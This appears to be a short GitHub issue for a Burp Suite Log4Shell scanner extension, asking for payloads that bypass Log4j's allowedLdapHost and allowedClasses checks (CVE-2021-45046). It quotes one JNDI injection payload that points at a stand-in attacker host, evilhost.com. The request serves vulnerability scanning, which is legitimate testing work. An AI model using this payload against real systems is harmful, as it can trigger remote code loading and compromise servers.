burp-log4shell
burp-log4shell copied to clipboard
Additional payloads for allowedLdapHost and allowedClasses bypass
This will require improved payloads:
https://twitter.com/marcioalm/status/1471740771581652995
Example from the twitter:
${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
Unfortunately it seems we won't be able to use collaborator for this :(
More info: https://twitter.com/buherator/status/1472102632105951232
FTR: This would be CVE-2021-45046